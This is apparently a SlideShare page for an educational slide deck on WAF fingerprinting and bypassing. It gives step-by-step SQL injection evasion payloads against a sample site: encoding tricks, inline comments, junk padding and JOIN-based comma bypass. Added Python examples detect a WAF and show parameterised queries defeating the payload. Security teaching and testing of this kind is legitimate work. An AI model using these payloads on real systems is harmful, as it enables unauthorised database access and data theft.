Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Using Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreUsing Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreJosh Sokol
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar GanievOWASP Russia
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)Wail Hassan
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Application Security Workshop
Application Security Workshop Application Security Workshop
Application Security Workshop Priyanka Aash
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 

Similar to Waf bypassing Techniques (20)

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Using Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreUsing Proxies To Secure Applications And More
Using Proxies To Secure Applications And More
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
gofortution
gofortutiongofortution
gofortution
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Web Security
Web SecurityWeb Security
Web Security
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Application Security Workshop
Application Security Workshop Application Security Workshop
Application Security Workshop
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
API SECURITY
API SECURITYAPI SECURITY
API SECURITY
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 

Recently uploaded

Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfakmcokerachita
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
URLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppURLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppCeline George
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
MENTAL STATUS EXAMINATION format.docx
MENTAL     STATUS EXAMINATION format.docxMENTAL     STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxPoojaSen20
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
mini mental status format.docx
mini    mental       status     format.docxmini    mental       status     format.docx
mini mental status format.docxPoojaSen20
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Celine George
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsKarinaGenton
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 

Recently uploaded (20)

Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdf
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
URLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppURLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website App
 
Crayon Activity Handout For the Crayon A

WAF Bypassing Techniques

9. Testing Environments
 Google Chrome
 Mozilla Firefox
 Internet Explorer
 Opera Browser

10. Products
 F5 BIG-IP WAF
 Sucuri
 ModSecurity
 Imperva Incapsula
 PHP-IDS (PHP Intrusion Detection System)
 Quick Defense
 AQTRONIX WebKnight (for IIS, based on ISAPI filters)
 Barracuda WAF
11. Fingerprinting WAF
 Some WAFs add their own cookie to the HTTP communication.
 Example: Citrix NetScaler WAF (the cookie is shown in the slide image).

13. Fingerprinting WAF
 On the basis of the HTTP response: other WAFs can be detected by the kind of HTTP response received when a malicious request is submitted; the response varies from one WAF to another. Some of the common responses are 403, 406, 419, 500, 501, etc.
15. Fingerprinting WAF
 Request and response for the ModSecurity firewall: the request (slide image)

16. Fingerprinting WAF
 Request and response for the ModSecurity firewall: the response (slide image)

17. Fingerprinting WAF
 Response from the WebKnight firewall (slide image)

18. Fingerprinting WAF
 Response from the WebKnight firewall as rendered in the browser (slide image)
19. Automatic Fingerprinting WAF
 Using Nmap scripts: nmap -p80 --script http-waf-detect <host>
 Using wafw00f: python wafw00f.py --url <URL>
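The manual technique of slides 11 to 19 (compare how the same endpoint answers a harmless value and a value carrying a known-bad marker) can be written as a small differential check, which is also a convenient way to confirm that a WAF actually sits in front of an application you are responsible for. The following is an added example, not code from the slides or from nmap/wafw00f: the status codes come from slide 13, the probe marker from the negative-model example on slide 6, and the two NetScaler cookie names are an assumption taken from public fingerprinting tools (the slides only say that NetScaler adds a cookie). The transports are constructed fakes so the script runs offline.

```python
# Added example (not from the slides): differential WAF detection. A benign value
# and a value carrying a known-bad marker go through the same transport; a status
# change to one of the codes listed on slide 13, or a WAF-specific Set-Cookie
# name, suggests a WAF is in front of the application. `send` is a constructed
# fake transport; a real HTTP client returning (status, headers) can replace it.
from typing import Callable, Dict, List, Optional, Tuple

Headers = List[Tuple[str, str]]             # repeated names allowed (Set-Cookie)
Response = Tuple[int, Headers]              # (status code, response headers)
Transport = Callable[[str, str], Response]  # (url, parameter value) -> response

BLOCK_CODES = {403, 406, 419, 500, 501}     # common WAF responses named on slide 13

# Marker taken from the deck's own negative-model example (slide 6).
PROBE_VALUE = "<script>alert(1)</script>"

# Cookie-name hints. ASSUMPTION: the slides only say NetScaler "adds a cookie"; the
# names below come from public fingerprinting tools, so treat a hit as a hint.
COOKIE_HINTS: Dict[str, str] = {
    "ns_af": "Citrix NetScaler",
    "citrix_ns_id": "Citrix NetScaler",
}


def cookie_names(headers: Headers) -> List[str]:
    """Return the cookie names from every Set-Cookie header in `headers`."""
    names = []
    for name, value in headers:
        if name.lower() == "set-cookie" and "=" in value:
            names.append(value.split("=", 1)[0].strip())
    return names


def fingerprint(send: Transport, url: str) -> Dict[str, object]:
    """Compare a benign request with a probe request and summarise the evidence."""
    benign_status, benign_headers = send(url, "1")
    probe_status, probe_headers = send(url, PROBE_VALUE)

    seen = set(cookie_names(benign_headers)) | set(cookie_names(probe_headers))
    vendor: Optional[str] = next(
        (vendor for cookie, vendor in COOKIE_HINTS.items() if cookie in seen), None
    )
    # A content-filtering WAF answers the probe differently from the benign
    # request; the application alone would normally answer both with 200.
    blocked = probe_status != benign_status and probe_status in BLOCK_CODES
    return {
        "waf_suspected": blocked or vendor is not None,
        "vendor_hint": vendor,
        "benign_status": benign_status,
        "probe_status": probe_status,
    }


# --- constructed fake transports for an offline demonstration -----------------

def fake_waf_server(url: str, value: str) -> Response:
    """Constructed stand-in for a host behind a cookie-setting, signature-based WAF."""
    headers = [("Content-Type", "text/html"), ("Set-Cookie", "ns_af=example; Path=/")]
    if "<script" in value.lower():          # negative-model signature from slide 6
        return 403, headers
    return 200, headers


def fake_plain_server(url: str, value: str) -> Response:
    """Constructed stand-in for a host with no WAF: every request gets 200."""
    return 200, [("Content-Type", "text/html")]


if __name__ == "__main__":
    for label, transport in (("waf", fake_waf_server), ("plain", fake_plain_server)):
        print(label, fingerprint(transport, "https://abc.com/index.php"))
```

Only the benign/probe status pair and the cookie names are compared, so the check stays independent of any vendor's response body; when you extend `COOKIE_HINTS`, record the cookies you have actually observed rather than guessing.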
20. Techniques to Bypass WAFs
 Bypassing WAF for SQL injection vulnerabilities
 Bypassing WAF for XSS issues
 Bypassing WAF for LFI and RFI vulnerabilities

21. General Techniques to Bypass WAF
 Null character injection
 Mixed case
 Inline comments
 Chunked requests
 Buffer overflow
 HTTP parameter pollution
 URL encoding
 Keyword splitting
 Replaced keywords
 Ignoring cookies
 Using data URIs
 Header injection

22. Bypassing WAF for SQL Injection Vulnerabilities
23. Example 1 (without WAF)
https://abc.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (with WAF)
https://abc.com/index.php?id=1'
HTTP/1.1 403 Forbidden, or HTTP/1.1 406 Not Acceptable, or HTTP/1.1 404 Not Found, or HTTP/1.1 500 Internal Server Error, or HTTP/1.1 400 Bad Request

24. Some recon on the WAF
Came to know ModSecurity is in action.
https://abc.com/index.php?id=1"
HTTP/1.1 200 OK
https://abc.com/index.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 6
This technique is URL encoding. Sometimes you need:
1) Double URL encoding: %2527 → %27 → '
2) Triple URL encoding: %252527 → %2527 → %27 → ' (a very rare case)
25. https://abc.com/index.php?id=1%27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• Is the 'ORDER' keyword blocked?
• Is the 'ORDER BY' keyword blocked?
• Is there any alternative to the ORDER BY query?
• Are spaces blocked?
Let's try.

26. https://abc.com/index.php?id=1%27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• The 'ORDER' keyword is blocked
• Check again: is 'ORDER' really blocked?
https://abc.com/index.php?id=1%27ORDER%23
HTTP/1.1 200 OK
New assumptions in mind:
• The 'ORDER' keyword is not blocked
• What is blocked then? SPACES ARE BLOCKED

27. https://abc.com/index.php?id=1%27 ORDER by 1 %23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1%27ORDERby1%23
HTTP/1.1 200 OK
No assumptions in mind, because only spaces are blocked.
28. Techniques to bypass spaces
 Using '+' instead of a space, e.g. order+by+1 (mostly blocked)
 Using inline comments '/**/' instead of spaces, e.g. order/**/by/**/1
 Using a combination of inline comments and URL encoding instead of spaces:
• Order/%2a%2a/by/%2a%2a/1
• Order%2f**%2fby%2f**%2f1
 Using a combination of inline comments, URL encoding and junk characters instead of spaces:
• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
• Order%2f*JUNKCHARACTERS*%2fby%2f*JUNKCHARACTERS*%2f1

29. Techniques to bypass spaces
 Using white-space characters: %0a, %0b, %0c, %0d, %a0, %09, %01
 The query becomes:
 ORDER%0aby%0a1
 ORDER%0bby%0b1
 ORDER%0cby%0c1
 ORDER%0Dby%0D1
 ORDER%A0by%A01
 ORDER%0D%0Aby%0D%0A1
30. https://abc.com/index.php?id=1%27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK
Let's suppose the number of columns is 3.
https://abc.com/index.php?id=1%27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• Are spaces blocked?

31. https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• Spaces were bypassed using inline comments... still blocked?
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are integers blocked?
• Are commas blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?
32. Techniques to Bypass
Using inline comments (if UNION is blocked):
 /*!50000UNION*/
 /*!40000UNION*/
 /*!00000UNION*/
Using URL-encoding techniques:
 %55nion (URL encoding)
 %2555nion (double URL encoding)
 %55%4e%49%4f%4e (UNION, every character encoded)
 Triple URL encoding can be used in the same way.
33. https://abc.com/index.php?id=1%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are integers blocked?
• Are commas blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?

34. https://abc.com/index.php?id=1%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are integers blocked?
• Are commas blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?

35. https://abc.com/index.php?id=1%27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1%27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind:
• The 'UNION' keyword is NOT blocked.
• The 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are NOT blocked.
• The combination "UNION SELECT" is blocked?
• "SELECT with integers" is NOT blocked.
36. Techniques to bypass the combination "union select"
 Using a combination of inline comments and URL encoding:
• /*!50000%55niOn*/ /*!50000%53eLECT*/
 Using white-space characters and URL encoding of the comment character (#):
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT

37. Techniques to bypass the combination "union select"
 Using buffer overflow:
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
 Sometimes the amount of junk needs to be increased as required:
UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT

38. Techniques to bypass the combination "union select"
 Using the DISTINCT statement: UNION DISTINCT SELECT
 Using the DISTINCTROW statement: UNION DISTINCTROW SELECT
40. Special case: what if commas get blocked?

41. https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind:
• The 'UNION' keyword is NOT blocked.
• The 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are blocked.
• The combination "UNION SELECT" is NOT blocked?
• "SELECT with integers" is NOT blocked.
Time to bypass commas ",".

42. Basic Bypasses
 URL encoding: %2c → ,
 Double URL encoding: %252c → %2c → ,
 Using inline comments /*!*/, e.g. UNION SELECT 1/*!,*/2

43. Basic Bypasses (same content as slide 42)
44. Advanced way to bypass commas
 Using JOIN
 JOIN is used for columns as UNION is used for rows
 We have SELECT 1,2,3
 SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

45. Advanced way to bypass commas
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
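The walkthrough never shows the page behind `index.php?id=`, and that is where the actual fix lives: the WAF only matters because the parameter is pasted into SQL text. The added example below (not code from the slides) writes that lookup twice. `lookup_vulnerable` concatenates the decoded parameter, so the comma-free UNION/JOIN payload from slide 45 executes; `lookup_hardened` applies the deck's positive-model rule (digits only, 0 to 65535) and binds the value as a parameter, so the same payload never reaches the SQL parser. It assumes `sqlite3` standing in for MySQL so that it runs offline; because SQLite has no `#` comment, the trailing `%23` is replaced by `--`, the SQLite line comment with the same role, and the table rows are constructed sample data.

```python
# Added example (not from the slides): the index.php?id= lookup the walkthrough
# targets, vulnerable and hardened side by side. sqlite3 stands in for MySQL;
# SQLite has no '#' comment, so slide 45's trailing %23 becomes '--'.
import re
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote

# Slide 45's comma-free payload, %23 swapped for '--' (see note above).
JOIN_PAYLOAD = (
    "1%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b--"
)


def make_db() -> sqlite3.Connection:
    """In-memory table with two constructed news rows (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "First post", "hello"), (2, "Second post", "world")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """String concatenation, as on the deck's target page. The web server
    decodes the parameter once (unquote) before the application sees it."""
    value = unquote(raw_id)
    sql = "SELECT title, body FROM news WHERE id='" + value + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # This is the kind of error text slide 23 shows leaking without a WAF.
        return [("error", str(exc))]


def lookup_hardened(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Positive-model validation (slide 7) plus a bound parameter: the value is
    never part of the SQL text, so comments, encodings and JOIN tricks are inert."""
    value = unquote(raw_id)
    if re.fullmatch(r"[0-9]{1,5}", value) is None or int(value) > 65535:
        return []  # rejected before any SQL is built
    return conn.execute(
        "SELECT title, body FROM news WHERE id=?", (int(value),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:  ", lookup_vulnerable(db, "1"))
    print("vulnerable, bare quote: ", lookup_vulnerable(db, "1%27"))
    print("vulnerable, JOIN payload:", lookup_vulnerable(db, JOIN_PAYLOAD))
    print("hardened, JOIN payload:  ", lookup_hardened(db, JOIN_PAYLOAD))
    print("hardened, normal id:     ", lookup_hardened(db, "1"))
```

Against the vulnerable lookup the payload adds the attacker-controlled row `(1, 2)` to the result set; against the hardened lookup the identical request returns nothing and never touches the database. The validation step is exactly the positive-model rule the deck describes, which is why a positive model needs no list of bypass patterns to keep up with.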
46. Similar approach for other vulnerabilities
 For XSS
 For LFI / RFI
DEMO TIME

47. References
 Images in slides 10, 11, 14, 15, 16, 17 are taken from http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!

Editor's Notes

  1. ISAPI filters are DLLs that extend the functionality of the IIS server; they are only available on IIS servers.